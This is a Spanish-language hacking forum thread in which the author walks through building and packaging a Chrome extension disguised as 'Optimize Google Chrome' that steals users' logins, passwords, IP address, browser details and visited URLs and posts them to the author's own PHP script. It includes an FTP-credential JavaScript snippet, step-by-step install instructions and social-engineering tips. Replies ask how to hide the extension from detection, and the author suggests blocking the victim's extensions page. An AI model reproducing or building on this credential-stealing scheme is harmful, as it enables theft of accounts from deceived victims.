Una Extension de user-pass Remoto (Google Chrome)

Al parecer esto se lo debo al dolor de cabeza que tuve ayer por la noche que hizo que me distrajera con alguna idea que se me salia de la imaginación  Como hace unas semanas vi un archivo javascript capaz de mostrar las contraseñas en forma local (escuchar al servidor) y en el nos arrojaba las contraseñas y el email.

Así que decidí ir por aquella imaginación que era tratar de enviar datos en forma remota:

1.- Primero se me paso por la cabeza que el javascript cree un archivo txt luego enviarlo, pero para crear un archivo txt un depende mucho de si es usuario que navega tiene los permisos suficiente Ademas no es lo mismo crear un txt linux-windows. Pero dije no es una loca idea.

2.-Segundo se me ocurrió enviar los datos via email. Pero como sabemos javascripit no es posible enviar , averigüé un poco mas que si se podía hacer mediante phpmailer pero dije bahh para eso necesito que hsoting tenga SSL ocorriento  443 , eso por que gmail-outlook necesita una conexión segura.

3.-Tercero pensé en enviar por el puerto 21 (FTP)para enviar los datos o sobre escribirlo  hice una conexión exitosa, pero como enviaba el archivo. Aunque con php si era posible pero lo que necesitaba era javascript... =(

function ftp_login(form) {
 var login = form.login.value;
 var pass= form.clave.value;
 var sererr = form.servidor.value;
 if (login && clave && servidor) {
 var ftp_connect = "ftp://" + login + ":" +pass + "@" + server;
 window.location = ftp_connect;
 }
 else {
 alert("=(No se conecto");
 }
 }

4.- Entonces dije si creo un zip el el que se guarde la contraseña y luego pueda enviarlo. Pero aun que sabia no era posible enviármelo al correo pero tal vez al FTP, puede llegar a crear un archivo zip pero con php e incluso podía enviar una imagen , uhmm entonces creí que tal vez podía enviar un screen, pero bueno sera para otra ocasión. Pero aquí esta el link con el cual se puede crear el archivo zip No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/

5.- Creo que las ideas se me acababan ya era las 3 a.m de la madrugada así que dije uhmmm me recode de XXS y dije EURECAAAAAAAAAAAA....!! Lo tenia...!!
Empecemos...!!
Bueno primero lo primero para crear el crx ( que es la extensión que tienen los complementos de Google Chrome) necesitamos 2 archivos el *.json y *.js (que es el javascript). En el *.json se encuentra la descripción del complemento . En mi caso fue lo siguiente: NO SE DEBE CAMBIAR EL NOMBRE" manifest.json"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Por que esta en ingles pues cuando instales el complemento la mayoría cuando se encuentra en otro idioma solo le pones YES.. asi que mejor esta ese idioma ademas el titulo es resaltante OPTIMIZAR Google Ghrome "En otras palabras " Obtener tu user y pass ". Luego verán que dice chrome.js ese es el archivo Javascript.

Ahora editamos el chrome.js lo único que necesitas editar por nuestro hosting  "localhost" Reemplazan por el suyo.


el javascripit tiene que estar en tener el tipo de codificacion UTF-8. Luego de ello vamos chrome y  *.json y *.js debe encontrarse en una carpeta.

Una vez abierto Chrome se dirigen a Extensiones.


Cuando nos encontremos ahi das click en el checkbox de Modo Desarrollador y luego Empaquetar Extensión.


Ahora se dirigen a la carpeta en donde se encuentra el *.json y  *.js en mi caso es C:\Users\Administrador\Desktop\Optimize Google Chrome esa misma dirección colocamos en el siguiente popup.


Luego empaquetara la extensión de google chrome.


Para poder instalar la extensión necesitas agregar

--enable-easy-off-store-extension-install

a las propiedades del acceso de google chrome.


Eso seria lo único negativo =( ..!!

Seguimos ahora ya podemos colocar la dirección que nos arrojo el popup en mi caso C:\Users\Administrador\Desktop\Optimize Google Chrome.crx el cual colocamos en la barra de dirección.

Ahora ya esta el 90 % del trabajo hecho, ahora solo necesitamos subir al hosting el archivo guardar.php acompañado de un archivo datos.txt (datos.txt debe tener los permisos suficientes para ser modificados).



ese archivo junto con el datos.txt deben subirlo al host. Si todo resulto bien cuando se ingrese a una pagina los datos serán enviados a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta usan el DECODEURL para no colocar un pass o un user incorrecto
Con la extensión se puede obtener:
<ul>
   <li>Contraseñas /Usuario</li>
   <li>El lenguaje</li>
   <li>Protocolo por el cual se navega</li>
   <li>El proxy</li>
   <li>Obtenemos el puerto</li>
   <li>El agente (wap o web)-(S.O)-(Navegador aunque ya sabemos que es google Chrome)</li>
   <li>La dirección ala que se accede</li>
   <li>La fecha.</li>
   <li> Y por supuesto la IP pública (podemos acceder a su router si es que la contraseña la tiene por default)</li>
</ul>

Link de Descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un AGRADECIMIENTO Especial a :
sh4r3m4n

Saludos

muy buena publicacion muchas gracias por esa informacion muy valiosa!! como podria encryptar el contenido de mi .crx si me la detectan?

Hice algunos testeos pero no llege a ofuscar el codigo, pero bueno se puede hacer redireciones aunque ya las visteNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta de esa manera haciendo inaccesible a la parte de extensiones de dicho navegador , la otra y no menos importante es darle la "flasa seguridad a victima".
Saludos

Hola acabo de probar sin agregar ese código a las propiedades de chrome y si me llega la user y contraseña 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola acabo de probar sin agregar ese código a las propiedades de chrome y si me llega la user y contraseña 

Es algo muy extraño , debido a que desde Agosto o Julio del año que paso las políticas de privacidad fueron mas severas con la instalación de  extensión que no se encuentren en el Web Store, de esta manera impidiendo su instalación.

Saludos.

Muy buena codepunisher, me gustó mucho el post!!

Saludos.

Muy bien, se ve que to has currado 

-Saludos-